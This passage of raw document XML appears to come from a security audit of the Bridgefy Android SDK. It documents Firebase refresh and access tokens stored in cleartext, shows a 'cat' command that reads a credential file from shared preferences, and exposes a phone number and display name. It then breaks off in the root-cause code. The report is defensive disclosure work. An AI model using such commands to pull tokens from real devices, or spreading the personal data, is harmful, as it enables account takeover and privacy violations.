      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>+12064512559</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\&amp;quot;,\&amp;qu ot;isEmailVerified\&amp;quot;:true}&amp;quot;,&amp;quot;{\&amp;quot;providerId\&amp;quot;:\&amp;quot;phone\&amp;quo t;,\&amp;quot;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>phoneNumber</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\&amp;quot;:\&amp;quot;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>+12064512559</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\&amp;quot;,\&amp;quot;isEmailVerified\&amp;quot;:f alse}&amp;quot;,&amp;quot;{\&amp;quot;userId\&amp;quot;:\&amp;quot;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>+12064512559</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>@bridgefy.app\&amp;quot;,\&amp;quot; providerId\&amp;quot;:\&amp;quot;password\&amp;quot;,\&amp;quot;displayName\&amp;quot;:\&amp;quot;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Oscar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\&amp;quot;,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\&amp;quot;email\&amp;quot;:\&amp;quot;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>+12064512559</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>@bridgefy.app\&amp;quot;,\&amp;quot;isEmailVerified\&amp;quo t;:false}&amp;quot;],&amp;quot;anonymous&amp;quot;:false,&amp;quot;version&amp;quot;:&amp;quot;2&amp;quot;,&amp;quot;us erMetadata&amp;quot;:{&amp;quot;lastSignInTimestamp&amp;quot;:1672960711950,&amp;quot;creationTimestamp &amp;quot;:1672061606835}}&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.google.firebase.auth.GET_TOKEN_RESPONSE.U309RRQIulX95ChRjWv16PqwFlp1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;{&amp;quot;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>refresh_token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&amp;quot;:&amp;quot;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>AO[...]sJnHmSO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&amp;quot;,&amp;quot;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>access_token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&amp;quot;:&amp;quot;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>eyJhb[...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&amp;quot;,&amp;quot;expires_in&amp;quot;:3600,&amp;quot;token_type&amp;quot;:&amp;quot;Bearer&amp;quot;,&amp;quot;iss ued_at&amp;quot;:1672966903252}&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="252"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>./shared_prefs/com.google.android.gms.appid.xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"|T|1052189342245|*"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;{&amp;quot;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&amp;quot;:&amp;quot;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>fxIFU8VLQ[...]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&amp;quot;,&amp;quot;appVersio n&amp;quot;:&amp;quot;1001&amp;quot;,&amp;quot;timestamp&amp;quot;:1673009263679}&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>cause</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>file:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-sdk-android/bridgefy-crypto/src/main/java/me/bridgefy/crypto/database/Bridgefy DatabaseWrapper.kt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="1115" w:right="0" w:hanging="396"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>internal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>BridgefyDatabaseWrapper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(context:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Context)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: CloseableDatabaseWrapper&lt;BridgefyDatabase&gt;(context) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="32"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="1511" w:right="3221" w:hanging="396"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>override</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>createDatabase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>BridgefyDatabase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Room.databaseBuilder(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
